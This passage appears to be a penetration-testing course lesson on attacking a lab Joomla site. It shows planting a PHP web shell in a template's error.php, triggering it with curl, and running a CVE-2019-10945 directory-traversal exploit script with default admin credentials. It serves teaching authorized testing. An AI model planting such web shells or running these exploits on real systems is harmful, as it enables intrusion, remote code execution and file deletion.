Abusing Built-In Functionality
If you receive an error stating “An error has occurred. Call to a member function format() on null” after logging in, navigate to “http://dev.inlanefreight.local/administrator/index.php?option=com_plugins” and disable the “Quick Icon - PHP Version Check” plugin. This will allow the control panel to display properly.
Using the credentials that we obtained in the examples from the last section, admin:admin, let’s log in to the target backend at http://dev.inlanefreight.local/administrator. Once logged in, we can see many options available to us. For our purposes, we would like to add a snippet of PHP code to gain RCE. We can do this by customizing a template.
From here, we can click on Templates on the bottom left under Configuration to pull up the templates menu.
Next, we can click on a template name. Let’s choose protostar under the Template column header. This will bring us to the Templates: Customise page.
Finally, we can click on a page to pull up the page source. It is a good idea to get in the habit of using non-standard file names and parameters for our web shells to not make them easily accessible to a “drive-by” attacker during the assessment. We can also password protect and even limit access down to our source IP address. Also, we must always remember to clean up web shells as soon as we are done with them but still include the file name, file hash, and location in our final report to the client.
Let’s choose the error.php page. We’ll add a PHP one-liner to gain code execution as follows.
system($_GET['dcfdd5e021a869fcc6dfaef8bf31377e']);curl -s http://dev.inlanefreight.local/templates/protostar/error.php?dcfdd5e021a869fcc6dfaef8bf31377e=idLeveraging Known Vulnerabilities
Researching a bit, we find that this version of Joomla is likely vulnerable to CVE-2019-10945 which is a directory traversal and authenticated file deletion vulnerability. We can use this exploit script to leverage the vulnerability and list the contents of the webroot and other directories. The python3 version of this same script can be found here. We can also use it to delete files (not recommended). This could lead to access to sensitive files such as a configuration file or script holding credentials if we can then access it via the application URL. An attacker could also cause damage by deleting necessary files if the webserver user has the proper permissions
python2.7 joomla_dir_trav.py --url "http://dev.inlanefreight.local/administrator/" --username admin --password admin --dir /